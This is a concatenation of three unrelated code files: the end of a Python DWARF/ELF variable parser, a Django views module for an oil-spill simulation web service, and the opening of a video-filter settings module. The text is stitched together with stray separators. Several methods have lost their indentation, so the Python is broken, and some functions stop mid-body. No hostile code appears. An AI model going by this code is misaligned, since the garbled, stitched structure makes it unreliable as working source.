TI ARM C/C++ Codegen PC v16.9.6.LTS
([], DIE DW_TAG_enumeration_type, size=13, has_children=True
|DW_AT_sibling : AttributeValue(name='DW_AT_sibling', form='DW_FORM_ref4', value=327, raw_value=327, offset=90158)
|DW_AT_name : AttributeValue(name='DW_AT_name', form='DW_FORM_strp', value=b'Direction', raw_value=10704, offset=90162)
|DW_AT_byte_size : AttributeValue(name='DW_AT_byte_size', form='DW_FORM_data1', value=1, raw_value=1, offset=90166)
|DW_AT_decl_column : AttributeValue(name='DW_AT_decl_column', form='DW_FORM_data1', value=6, raw_value=6, offset=90167)
|DW_AT_decl_file : AttributeValue(name='DW_AT_decl_file', form='DW_FORM_data1', value=1, raw_value=1, offset=90168)
|DW_AT_decl_line : AttributeValue(name='DW_AT_decl_line', form='DW_FORM_data1', value=68, raw_value=68, offset=90169)
)
gcc 7.2.1 x86_64
typedef enum {
DOWN=0,
UP=-1
} direction_t;
([DIE DW_TAG_typedef, size=11, has_children=False
|DW_AT_name : AttributeValue(name='DW_AT_name', form='DW_FORM_strp', value=b'direction_t', raw_value=3522, offset=7737)
|DW_AT_decl_file : AttributeValue(name='DW_AT_decl_file', form='DW_FORM_data1', value=1, raw_value=1, offset=7741)
|DW_AT_decl_line : AttributeValue(name='DW_AT_decl_line', form='DW_FORM_data1', value=199, raw_value=199, offset=7742)
|DW_AT_type : AttributeValue(name='DW_AT_type', form='DW_FORM_ref4', value=2087, raw_value=2087, offset=7743)
, DIE DW_TAG_enumeration_type, size=13, has_children=True
|DW_AT_encoding : AttributeValue(name='DW_AT_encoding', form='DW_FORM_data1', value=7, raw_value=7, offset=7712)
|DW_AT_byte_size : AttributeValue(name='DW_AT_byte_size', form='DW_FORM_data1', value=4, raw_value=4, offset=7713)
|DW_AT_type : AttributeValue(name='DW_AT_type', form='DW_FORM_ref4', value=51, raw_value=51, offset=7714)
|DW_AT_decl_file : AttributeValue(name='DW_AT_decl_file', form='DW_FORM_data1', value=1, raw_value=1, offset=7718)
|DW_AT_decl_line : AttributeValue(name='DW_AT_decl_line', form='DW_FORM_data1', value=196, raw_value=196, offset=7719)
|DW_AT_sibling : AttributeValue(name='DW_AT_sibling', form='DW_FORM_ref4', value=2112, raw_value=2112, offset=7720)
], DIE DW_TAG_base_type, size=7, has_children=False
|DW_AT_byte_size : AttributeValue(name='DW_AT_byte_size', form='DW_FORM_data1', value=4, raw_value=4, offset=5676)
|DW_AT_encoding : AttributeValue(name='DW_AT_encoding', form='DW_FORM_data1', value=7, raw_value=7, offset=5677)
|DW_AT_name : AttributeValue(name='DW_AT_name', form='DW_FORM_strp', value=b'unsigned int', raw_value=142, offset=5678)
)
"""
import sys
import logging
import struct
from functools import reduce
from itertools import chain
from elftools.elf.elffile import ELFFile
from elftools.elf.sections import SymbolTableSection, Symbol
try:
# pyelftools 0.24
from elftools.dwarf.structs import _ULEB128
except ImportError:
# pyelftools 0.27
from elftools.common.construct_utils import ULEB128 as _ULEB128
from elftools.dwarf.die import AttributeValue, DIE
from typing import Any, Dict, Iterator, List, Optional, Tuple, Union, Generator
# Module-level logger for all DWARF parsing messages.
logger = logging.getLogger('dwarf')
# Reusable ULEB128 decoder; pyelftools' constructor requires a (dummy) name.
uleb128 = _ULEB128('dummy')
class FileParser:
    """
    Parses an ELF file's DWARF info and symbol table and builds
    VarDescriptor objects for every typed variable DIE found.
    """
    def __init__(self, filename: str) -> None:
        self.all_dies = {}
        self.elf_file = None
        self.symbol_table = None
        f = open(filename, 'rb')
        logger.debug('Processing file: {}'.format(filename))
        self.elf_file = ELFFile(f)
        self.read_dies_from_dwarf_file()
        # the following assumes there's just one symbol table (ELF format allows more than one):
        self.symbol_tables = [x for x in self.elf_file.iter_sections() if isinstance(x, SymbolTableSection)]
        self.symbol_table = {x.name: x for x in chain(*[s.iter_symbols() for s in self.symbol_tables])}
        # Only variable DIEs that carry a type can be described.
        var_dies = {offset: die for offset, die in self.all_dies.items() if die.tag == 'DW_TAG_variable' and 'DW_AT_type' in die.attributes}
        logger.debug("read %d DIEs which include %d variable DIEs" % (len(self.all_dies), len(var_dies)))
        self.var_descriptors = var_descriptors = []
        for offset, var_die in var_dies.items():
            var_descriptors.append(VarDescriptor(self, self.all_dies, var_die, None))
        self.interesting_vars = [v for v in var_descriptors if v.is_interesting()]
        # note the file is intentionally kept open, otherwise some functions would fail later
    def read_dies_from_dwarf_file(self) -> None:
        """Collect every DIE of every compilation unit into self.all_dies."""
        if not self.elf_file.has_dwarf_info():
            logger.error('file has no DWARF info')
            return
        dwarfinfo = self.elf_file.get_dwarf_info()
        for CU in dwarfinfo.iter_CUs():
            top_DIE = CU.get_top_DIE()
            self.read_die_rec(top_DIE)
    def read_die_rec(self, die: DIE) -> None:
        # Depth-first walk, indexing every DIE by its DWARF offset.
        self.all_dies[die.offset] = die
        for child in die.iter_children():
            self.read_die_rec(child)
    def visit_interesting_vars_tree_leafs(self) -> Generator['VarDescriptor', None, None]:
        """Yield the leaf descriptors of every interesting variable tree."""
        for v in self.interesting_vars:
            yield from v.visit_leafs()
    def pretty_print(self, children=None, tab=0):
        # Recursively print the variable tree, one indent level per depth.
        if children is None:
            children = self.interesting_vars
        for v in children:
            print("{}{!s}".format('   ' * tab, v))
            self.pretty_print(children=v.children, tab=tab + 1)
    def read_value_at_address(self, address, size, section_name='st_shndx'):
        """
        NOTE(review): this method always returns None; everything after the
        `return` is unreachable and references an undefined `symbol`.
        It looks abandoned or half-refactored -- confirm intent before use.
        """
        return None
        section_num = symbol.entry[section_name]
        section = self.elf_file.get_section(section_num)
        section_start_addr = section['sh_addr']
        return section.data()[address - section_start_addr : address - section_start_addr + size]
    def get_value_by_name(self, name, var_descriptor=None):
        """
        Read a variable's initial-value bytes from its ELF section.

        Returns raw bytes, an int for SHN_ABS symbols, or None whenever
        the value cannot be resolved.
        """
        if self.symbol_table is None:
            return None  # TODO more meaningful error return values?
        if name not in self.symbol_table:
            return None
        symbol = self.symbol_table[name]
        if symbol is None:
            return None  # TODO more meaningful error return values?
        if not isinstance(symbol, Symbol):
            symbol = symbol[0]
        section_num = symbol.entry['st_shndx']
        if not isinstance(section_num, int):  # several special cases are possible
            if section_num == 'SHN_ABS':  # special case, means symbol['st_value'] isn't an address but an actual value
                return symbol['st_value']
            else:  # other special cases are not implemented
                return None  # TODO more meaningful error return values?
        address = symbol['st_value']
        # size = symbol['st_size'] # NOT GOOD, rounded to multiple of 4 or something.
        # have to look up size in DWARF data (var_descriptor):
        if var_descriptor is None:  # hack - mixed use cases. should fix
            var_descriptor = [x for x in self.var_descriptors if x.name == name]
            if var_descriptor is None or len(var_descriptor) > 1:
                return None  # TODO more meaningful error return values?
            var_descriptor = var_descriptor[0]
        size = var_descriptor.size
        if size is None:
            return None  # TODO more meaningful error return values?
        section = self.elf_file.get_section(section_num)
        section_start_addr = section['sh_addr']
        return section.data()[address - section_start_addr : address - section_start_addr + size]
# DWARF expression opcodes (DWARF v3 specification).
DW_OP_plus_uconst = 0x23  # Page 20
DW_OP_addr = 0x3  # Page 14
class DwarfTypeMissingRequiredAttribute(Exception):
    """Raised when a DWARF variable DIE lacks an attribute we require."""
    def __init__(self, var, name):
        # Keep the offending descriptor and attribute name for callers.
        self.var = var
        self.name = name
        message = 'DWARF var {} missing attribute {}'.format(var.name, name)
        super().__init__(message)
# Byte-size -> decoder for a little-endian *signed* integer of that size.
int_unpack_from_size = {
    8: lambda v: struct.unpack('<q', v)[0],
    4: lambda v: struct.unpack('<l', v)[0],
    2: lambda v: struct.unpack('<h', v)[0],
    1: lambda v: struct.unpack('<b', v)[0],
}
class VarDescriptor:
    """
    Wraps one variable DIE: resolves its name, address, type, size,
    initial value and (for aggregates) child descriptors.
    """
    # Symbols never worth showing to the user.
    uninteresting_var_names = ['main_func_sp', 'g_pfnVectors']
    # DWARF tag names used while walking type chains.
    DW_TAG_class_type = 'DW_TAG_class_type'
    DW_TAG_const_type = 'DW_TAG_const_type'
    DW_TAG_volatile_type = 'DW_TAG_volatile_type'
    DW_TAG_pointer_type = 'DW_TAG_pointer_type'
    DW_TAG_array_type = 'DW_TAG_array_type'
    DW_TAG_subrange_type = 'DW_TAG_subrange_type'
    DW_TAG_enumeration_type = 'DW_TAG_enumeration_type'
    DW_TAG_typedef = 'DW_TAG_typedef'
    # Human-readable names for type-modifier tags.
    type_tags_to_names = {DW_TAG_class_type: 'class',
                          DW_TAG_const_type: 'const',
                          DW_TAG_volatile_type: 'volatile',
                          DW_TAG_pointer_type: 'pointer to',
                          DW_TAG_array_type: 'array of',
                          DW_TAG_typedef: 'typedef'}
    # DWARF attribute names.
    DW_AT_name = 'DW_AT_name'
    DW_AT_type = 'DW_AT_type'
    DW_AT_external = 'DW_AT_external'
    DW_AT_location = 'DW_AT_location'
    DW_AT_decl_line = 'DW_AT_decl_line'
    DW_AT_byte_size = 'DW_AT_byte_size'
    DW_AT_upper_bound = 'DW_AT_upper_bound'
    DW_AT_data_member_location = 'DW_AT_data_member_location'
    # Marker returned when a location expression cannot be decoded.
    ADDRESS_TYPE_UNSUPPORTED = '(Address Type Unsupported)'
    def __init__(self, parser: FileParser, all_dies: Dict[int, DIE], var_die: DIE, parent: None) -> None:
        self.parser = parser
        self.parent = parent
        self.all_dies = all_dies
        self.var_die = var_die
        # DW_AT_name is optional (e.g. anonymous members).
        die_name = self.get_attribute_value(self.DW_AT_name, required=False)
        self.name = die_name.decode('utf-8') if die_name is not None else None
        self.address = self.parse_location()
        self.type = self.get_type_die(var_die)
        self.size = self._get_size()
        # look for default value
        init_value = self.parser.get_value_by_name(self.name, self)
        # Decode raw bytes into a little-endian signed integer when the
        # size is one we know how to unpack; otherwise keep as-is.
        if init_value is not None and \
                not isinstance(init_value, int) and \
                len(init_value) > 0 and \
                self.size in int_unpack_from_size:
            self.init_value = int_unpack_from_size[self.size](init_value)
        else:
            self.init_value = init_value
        # Pointers are not expanded into children (avoids indirection/cycles).
        if not self.is_pointer():
            self.children = self._create_children()
        else:
            self.children = []
    def parse_location(self) -> Union[str, int]:
        """
        Resolve this variable's address: member offset first, then the
        DW_AT_location attribute, finally the ELF symbol table.

        Returns an int address or a descriptive marker string.
        """
        # TODO: handle address parsing better and for more cases (using an interface for processing DWARF expressions?)
        ret = self._parse_member_location()
        if ret is None:
            ret = self._parse_location_attribute()
        if ret is None:
            # in some cases DWARF doesn't have address info but the symbol table does,
            # for example singletons that are referenced through extern declaration in other files
            if self.name in self.parser.symbol_table:
                ret = self.parser.symbol_table[self.name].entry['st_value']
            else:
                ret = "(No Address)"
        return ret
    def _parse_member_location(self) -> Union[str, int, None]:
        """
        Compute a struct member's absolute address from its parent's
        address plus the DW_AT_data_member_location offset.

        Returns None when this DIE is not a member, or a marker string
        when the offset encoding is unsupported.
        """
        attr = self.get_attribute(self.DW_AT_data_member_location)
        if attr is None:
            return None
        # Only members (which always have a parent) carry this attribute.
        assert self.parent is not None
        if attr.form == 'DW_FORM_block1':
            # Expression form: expect [DW_OP_plus_uconst, ULEB128 offset].
            opcode = attr.value[0]
            if opcode != DW_OP_plus_uconst:
                return self.ADDRESS_TYPE_UNSUPPORTED
            offset = uleb128.parse(bytes(attr.value[1:]))
        elif attr.form in ['DW_FORM_data1', 'DW_FORM_data2', 'DW_FORM_data4']:
            # Constant form: the value is the offset itself.
            offset = attr.value
        else:
            return self.ADDRESS_TYPE_UNSUPPORTED
        if not isinstance(self.parent.address, int):
            # Parent address itself could not be resolved.
            return self.ADDRESS_TYPE_UNSUPPORTED
        return self.parent.address + offset
def _parse_location_attribute(self) -> Union[str, int]:
loc = self.get_attribute(self.DW_AT_location)
if loc is None:
return None
if loc.form == 'DW_FORM_exprloc':
return self._parse_address_exprloc(loc)
elif loc.form == 'DW_FORM_block1':
return self._parse_address_block1(loc)
return self.ADDRESS_TYPE_UNSUPPORTED
    def _parse_address_exprloc(self, loc: AttributeValue) -> Union[str, int]:
        """Decode a DW_FORM_exprloc location (treated the same as block1)."""
        # TODO right now only supporting exprloc of the same format as block1:
        return self._parse_address_block1(loc)
def _parse_address_block1(self, loc: AttributeValue) -> Union[str, int]:
opcode = loc.value[0]
if len(loc.value) == 9 and opcode == DW_OP_addr: # seen with amd64 compilation of static variables
# should use host endianess
return struct.unpack('<q', struct.pack('bbbbbbbb', *loc.value[1:]))[0]
if len(loc.value) != 5 or opcode != DW_OP_addr:
return self.ADDRESS_TYPE_UNSUPPORTED
a, b, c, d = loc.value[1:]
return a + (b << 8) + (c << 16) + (d << 24)
    def _die_at_attr(self, die: DIE, attr_name: str) -> Union[DIE, str]:
        """
        Follow a reference attribute to the DIE it points at.

        DW_FORM_ref_addr stores an absolute offset into the DWARF info;
        DW_FORM_ref4 stores an offset relative to the compilation unit.
        NOTE(review): unsupported forms return an error *string* rather
        than a DIE -- confirm whether raising would be more appropriate.
        """
        attr = die.attributes[attr_name]
        if attr.form == 'DW_FORM_ref_addr':
            die_offset = attr.value # store offset is absolute offset in the DWARF info
        elif attr.form == 'DW_FORM_ref4':
            die_offset = attr.value + die.cu.cu_offset # Stored offset is relative to the current Compilation Unit
        else:
            return ("Unsupported form of the type attribute: %s" % attr.form)
        return self.all_dies[die_offset]
    def get_type_die(self, die: DIE) -> Union[DIE, str]:
        """
        Resolve the DIE describing `die`'s type via DW_AT_type.

        NOTE(review): returns a descriptive *string* when the attribute
        is absent instead of raising -- callers must not assume a DIE.
        """
        if 'DW_AT_type' not in die.attributes:
            return "No type die"
        type_die = self._die_at_attr(die, self.DW_AT_type)
        return type_die
def is_interesting(self) -> bool:
# TODO: better criteria than the address?
return (
isinstance(self.address, int) # either an address was not specified or is not a fixed address in RAM (local var, const in flash memory, etc)
and not self.name.startswith('_') # various system variables
and not self.name.startswith('$') # not sure when these pop up but they are not interesting
and not self.name in VarDescriptor.uninteresting_var_names)
def get_die_tags(self) -> List[str]:
type_chain, last_type = self.visit_type_chain()
type_chain.append(last_type)
| |
<filename>hcmr_pilot/views.py<gh_stars>1-10
import csv
import sys
import json
from django.core.exceptions import PermissionDenied
from django.template.loader import render_to_string
import folium
from folium import plugins
import numpy as np
from PIL import Image, ImageChops
from bs4 import BeautifulSoup
import requests
from django.http import HttpResponseRedirect, HttpResponse, JsonResponse
from django.shortcuts import render, redirect
import time
from pandas import DataFrame
from .forms import HCMRForm
import calculate_red_points as red_points_calc
from django.conf import settings
from access_controller.policy_enforcement_point import PEP
from service_builder.models import Service, ServiceInstance
from threading import Thread
from datetime import datetime
from query_designer.models import AbstractQuery
import prestodb
import psycopg2
import requests
import time
from datetime import datetime, timedelta
def trim(img):
    """
    Crop away the uniform border of `img` (color taken from the top-left
    pixel) and return the result as a numpy array.
    """
    corner_color = img.getpixel((0, 0))
    border = Image.new(img.mode, img.size, corner_color)
    # Amplify the difference against the border color so near-background
    # pixels are not included in the bounding box.
    delta = ImageChops.difference(img, border)
    delta = ImageChops.add(delta, delta, 2.0, -100)
    box = delta.getbbox()
    if box:
        img = img.crop(box)
    return np.array(img)
def check_access(request, service):
    """
    Raise PermissionDenied unless the policy enforcement point grants
    `request` access to `service`.
    """
    if PEP.access_to_service(request, service.id) is False:
        raise PermissionDenied
def create_map():
    """
    Build the base folium map (Mapbox satellite tiles, centered on
    Greece) with a fullscreen control attached.
    """
    tiles_str = 'https://api.mapbox.com/v4/mapbox.satellite/{z}/{x}/{y}.png?access_token='
    # Mapbox access token (redacted placeholder in this source).
    token_str = '<KEY>'
    attr_str = 'Map data &copy;<a href="http://openstreetmap.org">OpenStreetMap</a>contributors, ' + '<a href="http://creativecommons.org/licenses/by-sa/2.0/">CC-BY-SA</a>, ' + 'Imagery \u00A9 <a href="http://mapbox.com">Mapbox</a>'
    # Initial view roughly over Greece.
    location = [38.41, 21.97]
    zoom_start = 5
    max_zoom = 30
    min_zoom = 2
    m = folium.Map(location=location,
                   zoom_start=zoom_start,
                   max_zoom=max_zoom,
                   min_zoom=min_zoom,
                   max_bounds=True,
                   tiles=tiles_str + token_str,
                   attr=attr_str)
    plugins.Fullscreen(
        position='topright',
        title='Expand me',
        title_cancel='Exit me',
        force_separate_button=True).add_to(m)
    return m
from website_analytics.views import *
def init(request):
    """
    Render the HCMR oil-spill service page for the requested scenario:
    builds the base map (plus AIS density overlay for scenario 2) and
    passes the execution-step labels and simulation-length choices.
    """
    form = HCMRForm()
    scenario = request.GET['scenario']
    print scenario
    # Progress-step labels shown in the UI, per scenario.
    # NOTE(review): all three scenarios currently share the same list.
    execution_steps = dict()
    execution_steps['OIL_SPILL_SCENARIO_1'] = ["starting service", "Creating simulation request",
                                               "Simulation running", "Simulation results received",
                                               "Transforming data to be shown on map",
                                               "Calculating oil spill intersections with protected areas", "done"]
    execution_steps['OIL_SPILL_SCENARIO_2'] = ["starting service", "Creating simulation request",
                                               "Simulation running", "Simulation results received",
                                               "Transforming data to be shown on map",
                                               "Calculating oil spill intersections with protected areas", "done"]
    execution_steps['OIL_SPILL_SCENARIO_3'] = ["starting service", "Creating simulation request",
                                               "Simulation running", "Simulation results received",
                                               "Transforming data to be shown on map",
                                               "Calculating oil spill intersections with protected areas", "done"]
    # Simulation-length choices: 12..720 in steps of 12 (hours).
    # NOTE(review): `list` shadows the builtin name.
    list = []
    for i in range(0, 61):
        list.append(i*12)
    list.pop(0)
    m = create_map()
    if int(scenario) == 2:
        # Scenario 2 additionally shows the precomputed AIS density map.
        data_img = Image.open('visualizer/static/visualizer/img/ais_density_maps/ais_data_photo_med.png')
        data = trim(data_img)
        data_img.close()
        # Overlay the image
        density_map_layer = plugins.ImageOverlay(data, zindex=1, opacity=0.5, mercator_project=True,
                                                 bounds=[[30.13, -5.941], [45.86, 36.42]])
        density_map_layer.layer_name = 'AIS Density Map'
        m.add_child(density_map_layer)
    folium.LayerControl().add_to(m)
    # Render the folium map to a throwaway HTML file, then scrape out the
    # generated div id, scripts and stylesheets for template embedding.
    # NOTE(review): the temp file is never deleted -- confirm cleanup.
    temp_map = 'templates/map1' + str(int(time.time())) + '.html'
    m.save(temp_map)
    map_html = open(temp_map, 'r').read()
    soup = BeautifulSoup(map_html, 'html.parser')
    map_id = soup.find("div", {"class": "folium-map"}).get('id')
    js_all = soup.findAll('script')
    # print(js_all)
    if len(js_all) > 5:
        js_all = [js.prettify() for js in js_all[5:]]
    css_all = soup.findAll('link')
    if len(css_all) > 3:
        css_all = [css.prettify() for css in css_all[3:]]
    print map_id
    return render(request, 'hcmr_pilot/load_service.html', {'form': form, 'scenario': scenario, 'execution_steps': execution_steps, 'sim_len_list': list, 'map_id': map_id, 'js_all': js_all, 'css_all': css_all})
def scenario1_results(request, exec_instance):
    """Render the results page for scenario 1 (Oil Spill Dispersion Forecast).

    Loads the stored ServiceInstance, extracts the simulation set-up and the
    oil-spill time series, converts each timestamp to epoch milliseconds
    (naive times treated as UTC) and builds the template context.

    :param request: Django HTTP request.
    :param exec_instance: primary key of the ServiceInstance to display.
    :return: rendered ``hcmr_pilot/scenario1-results.html`` response.
    """
    import pytz
    service_exec = ServiceInstance.objects.get(pk=int(exec_instance))
    visualization_url = service_exec.dataframe_visualizations['v1']
    # First arguments dict holds the simulation set-up, second holds the spill series.
    alg_args = service_exec.arguments['algorithm-arguments'][0]
    filename_output = alg_args['out_filepath']
    location_lat = float(alg_args['latitude'])
    location_lon = float(alg_args['longitude'])
    start_date = alg_args['start_date']
    oil_volume = alg_args['oil_volume']
    wave_forecast_dataset = alg_args['wave_model']
    hydrodynamic_model = alg_args['ocean_model']
    sim_length = alg_args['sim_length']
    spill_data = service_exec.arguments['algorithm-arguments'][1]['spill_data']
    # Spill row layout (by index): 0=timestamp, 2=evaporated, 3=on surface,
    # 4=emulsified, 6=on coasts -- assumed from usage; confirm against producer.
    legend_data = [{"timestamp": d[0], "time": d[0], "init_vol": oil_volume,
                    "evap_vol": d[2], "emul_vol": d[4],
                    "vol_on_surface": d[3], "vol_on_coasts": d[6]} for d in spill_data]
    for d in legend_data:
        d_mod = datetime.strptime(d['timestamp'], "%Y-%m-%d %H:%M:%S")
        # Epoch milliseconds; the parsed naive time is interpreted as UTC.
        d['timestamp'] = long(
            (d_mod.replace(tzinfo=pytz.utc) - datetime(1970, 1, 1, tzinfo=pytz.utc)).total_seconds() * 1000)
        d['time'] = str(d_mod)
    context = {
        'url': visualization_url,
        'out_filepath': filename_output,
        'legend_data': legend_data,
        'result': [],
        'service_title': 'Oil Spill Dispersion Forecast Acquisition',
        'back_url': '/oilspill/?scenario=1',
        'study_conditions': [{'icon': 'fas fa-map-marker-alt', 'text': 'Location (latitude, longitude):', 'value': '(' + str(round(location_lat, 3)) + ', ' + str(round(location_lon, 3)) + ')'},
                             {'icon': 'far fa-calendar-alt', 'text': 'Date and Time:', 'value': str(start_date)},
                             {'icon': 'far fa-clock', 'text': 'Simulation Length', 'value': str(sim_length) + ' hours'},
                             {'icon': 'fas fa-database', 'text': 'Ocean Circulation Model:', 'value': str(hydrodynamic_model)},
                             {'icon': 'fas fa-box', 'text': 'Wave Model:', 'value': str(wave_forecast_dataset)}],
    }
    return render(request, 'hcmr_pilot/scenario1-results.html', context)
def scenario2_results(request, exec_instance):
    """Render the results page for scenario 2 (High Risk Pollution Areas).

    Loads the stored ServiceInstance, collects the (lat, lon) of every release
    point, totals the oil volume across points, converts the spill-series
    timestamps to epoch milliseconds (naive times treated as UTC) and builds
    the template context.

    :param request: Django HTTP request.
    :param exec_instance: primary key of the ServiceInstance to display.
    :return: rendered response (reuses the scenario-1 template).
    """
    import pytz
    service_exec = ServiceInstance.objects.get(pk=int(exec_instance))
    visualization_url = service_exec.dataframe_visualizations['v1']
    alg_args = service_exec.arguments['algorithm-arguments'][0]
    filename_output = alg_args['out_filepath']
    # One latitude<i>/longitude<i> pair per release point, rounded for display.
    number_of_points = int(alg_args['number_of_points'])
    list_of_points = [(round(float(alg_args['latitude' + str(i)]), 3),
                       round(float(alg_args['longitude' + str(i)]), 3))
                      for i in range(1, number_of_points + 1)]
    start_date = alg_args['start_date']
    # Total volume = per-point volume times the number of release points.
    oil_volume = str(number_of_points * int(alg_args['oil_volume']))
    wave_forecast_dataset = alg_args['wave_model']
    hydrodynamic_model = alg_args['ocean_model']
    sim_length = alg_args['sim_length']
    spill_data = service_exec.arguments['algorithm-arguments'][1]['spill_data']
    # Spill row layout (by index): 0=timestamp, 2=evaporated, 3=on surface,
    # 4=emulsified, 6=on coasts -- assumed from usage; confirm against producer.
    legend_data = [{"timestamp": d[0], "time": d[0], "init_vol": oil_volume,
                    "evap_vol": d[2], "emul_vol": d[4],
                    "vol_on_surface": d[3], "vol_on_coasts": d[6]} for d in spill_data]
    for d in legend_data:
        d_mod = datetime.strptime(d['timestamp'], "%Y-%m-%d %H:%M:%S")
        # Epoch milliseconds; the parsed naive time is interpreted as UTC.
        d['timestamp'] = long(
            (d_mod.replace(tzinfo=pytz.utc) - datetime(1970, 1, 1, tzinfo=pytz.utc)).total_seconds() * 1000)
        d['time'] = str(d_mod)
    context = {
        'url': visualization_url,
        'out_filepath': filename_output,
        'legend_data': legend_data,
        'result': [],
        'service_title': 'High Risk Pollution Areas',
        'back_url': '/oilspill/?scenario=2',
        'study_conditions': [{'icon': 'fas fa-map-marker-alt', 'text': 'Location (latitude, longitude):',
                              'value': str(list_of_points)},
                             {'icon': 'far fa-calendar-alt', 'text': 'Date and Time:', 'value': str(start_date)},
                             {'icon': 'far fa-clock', 'text': 'Simulation Length', 'value': str(sim_length) + ' hours'},
                             {'icon': 'fas fa-database', 'text': 'Ocean Circulation Model:', 'value': str(hydrodynamic_model)},
                             {'icon': 'fas fa-box', 'text': 'Wave Model:', 'value': str(wave_forecast_dataset)}],
    }
    # NOTE(review): intentionally(?) reuses the scenario-1 template -- confirm.
    return render(request, 'hcmr_pilot/scenario1-results.html', context)
def scenario3_results(request, exec_instance):
    """Render the results page for scenario 3 (Underwater Accident).

    Loads the stored ServiceInstance, extracts the release location (with
    depth), converts the spill-series timestamps to epoch milliseconds
    (naive times treated as UTC), reads the per-depth data from the
    companion JSON output and builds the template context.

    :param request: Django HTTP request.
    :param exec_instance: primary key of the ServiceInstance to display.
    :return: rendered ``hcmr_pilot/scenario3-results.html`` response.
    """
    import pytz
    service_exec = ServiceInstance.objects.get(pk=int(exec_instance))
    visualization_url = service_exec.dataframe_visualizations['v1']
    alg_args = service_exec.arguments['algorithm-arguments'][0]
    filename_output = alg_args['out_filepath']
    location_lat = float(alg_args['latitude'])
    location_lon = float(alg_args['longitude'])
    location_dep = float(alg_args['depth'])
    start_date = alg_args['start_date']
    oil_volume = alg_args['oil_volume']
    wave_forecast_dataset = alg_args['wave_model']
    hydrodynamic_model = alg_args['ocean_model']
    sim_length = alg_args['sim_length']
    spill_data = service_exec.arguments['algorithm-arguments'][1]['spill_data']
    # Spill row layout (by index): 0=timestamp, 2=evaporated, 3=on surface,
    # 4=emulsified, 6=on coasts -- assumed from usage; confirm against producer.
    legend_data = [{"timestamp": d[0], "time": d[0], "init_vol": oil_volume,
                    "evap_vol": d[2], "emul_vol": d[4],
                    "vol_on_surface": d[3], "vol_on_coasts": d[6]} for d in spill_data]
    for d in legend_data:
        d_mod = datetime.strptime(d['timestamp'], "%Y-%m-%d %H:%M:%S")
        # Epoch milliseconds; the parsed naive time is interpreted as UTC.
        d['timestamp'] = long(
            (d_mod.replace(tzinfo=pytz.utc) - datetime(1970, 1, 1, tzinfo=pytz.utc)).total_seconds() * 1000)
        d['time'] = str(d_mod)
    # The simulator writes depth data next to the .out file as a JSON file.
    output_json = filename_output.replace('_F.out', '.json')
    depth_data = extract_depth_data(str(output_json))
    context = {
        'start_lat': round(location_lat, 3),
        'start_lon': round(location_lon, 3),
        'start_depth': round(location_dep, 3),
        'depth_data': depth_data,
        'url': visualization_url,
        'out_filepath': filename_output,
        'legend_data': legend_data,
        'result': [],
        'service_title': 'Underwater Accident',
        'back_url': '/oilspill/?scenario=3',
        'study_conditions': [{'icon': 'fas fa-map-marker-alt', 'text': 'Location (latitude, longitude, depth):',
                              'value': '(' + str(round(location_lat, 3)) + ', ' + str(round(location_lon, 3)) + ', ' + str(round(location_dep, 3)) + ')'},
                             {'icon': 'far fa-calendar-alt', 'text': 'Date and Time:', 'value': str(start_date)},
                             {'icon': 'far fa-clock', 'text': 'Simulation Length', 'value': str(sim_length) + ' hours'},
                             {'icon': 'fas fa-database', 'text': 'Ocean Circulation Model:', 'value': str(hydrodynamic_model)},
                             {'icon': 'fas fa-box', 'text': 'Wave Model:', 'value': str(wave_forecast_dataset)}],
    }
    return render(request, 'hcmr_pilot/scenario3-results.html', context)
def index(request):
    """Show the service configuration form.

    On a GET with valid form data redirect to /process/; otherwise render
    the configuration page with either the bound or an empty form.
    """
    if request.method != 'GET':
        empty_form = HCMRForm()
        return render(request, 'hcmr_pilot/config-service-form-fields.html', {'form': empty_form})
    bound_form = HCMRForm(request.GET)
    if bound_form.is_valid():
        return HttpResponseRedirect('/process/')
    return render(request, 'hcmr_pilot/config-service-form-fields.html', {'form': bound_form})
def execute(request):
    """Start an asynchronous execution of the selected oil-spill service.

    Looks up the Service configured for the ``scenario`` GET parameter
    ('1'-'3'), records a new ServiceInstance and spawns a worker thread
    running :func:`process`, so the HTTP response returns immediately.

    :param request: Django HTTP request (``scenario`` in the query string).
    :return: JsonResponse with the new instance id under 'exec_instance'.
    :raises ValueError: if the scenario parameter is not '1', '2' or '3'.
    """
    scenario = str(request.GET.get('scenario'))
    # Map each scenario id to its configured service primary key.
    service_ids = {
        '1': settings.OIL_SPILL_FORECAST_SERVICE_ID,
        '2': settings.HIGH_RISK_POLLUTION_SERVICE_ID,
        '3': settings.UNDERWATER_ACCIDENT_SERVICE_ID,
    }
    if scenario not in service_ids:
        # Previously an unknown scenario crashed with NameError ('service'
        # never bound); fail with an explicit, descriptive error instead.
        raise ValueError('Unknown scenario: %s' % scenario)
    service = Service.objects.get(pk=service_ids[scenario])
    check_access(request, service)
    service_exec = ServiceInstance(service=service, user=request.user, time=datetime.now(),
                                   status="starting service", dataframe_visualizations=[])
    service_exec.save()
    # Spawn a thread to process the data in the background.
    t = Thread(target=process, args=(request, service_exec.id))
    t.start()
    return JsonResponse({'exec_instance': service_exec.id})
def process(request, exec_instance):
dataset_list = []
service_exec = ServiceInstance.objects.get(pk=int(exec_instance))
try:
service_exec.arguments = {"filter-arguments": [], "algorithm-arguments": [{}, {}]}
spill_infos, wave_model, ocean_model, natura_layer, ais_layer, time_interval, sim_length, oil_density, \
valid_points, valid_points_count, scenario, start_date, latitude, longitude, contours_layer, contours_var = \
parse_request_params(request)
depth = 0
if (scenario == '1') or (scenario == '3'):
service_exec.arguments["algorithm-arguments"][0]["latitude"] = spill_infos[0]['latitude']
service_exec.arguments["algorithm-arguments"][0]["longitude"] = spill_infos[0]['longitude']
if scenario == '3':
cursor_presto = get_presto_cursor()
resolution = 1
if wave_model == '202':
query = "SELECT * FROM (SELECT min(depth) FROM hcmr_poseidon_aeg_bathymetry WHERE round(latitude," + str(resolution) +" )=" + str(round(
float(spill_infos[0]['latitude']), resolution)) + " AND round(longitude," + str(resolution) + ")=" + str(round(
float(spill_infos[0]['longitude']),resolution)) + ")"
cursor_presto.execute(query)
try:
dataset_list.append((Dataset.objects.get(table_name='hcmr_poseidon_aeg_bathymetry')).id)
except:
print 'Dataset does not exist in database'
else:
query = "SELECT * FROM (SELECT min(depth) FROM hcmr_poseidon_med_bathymetry | |
<filename>qtgmc_modern/settings/_interface.py<gh_stars>1-10
"""
Implements the interface in static typing and at runtime plus some enumerations.
"""
__all__ = [
'CoreParam', 'CoreSettings',
'VSCallableD',
'InterpolationSettings',
'MotionAnalysisSettings',
'SharpnessSettings',
'SourceMatchSettings',
'NoiseSettings',
'MotionBlurSettings',
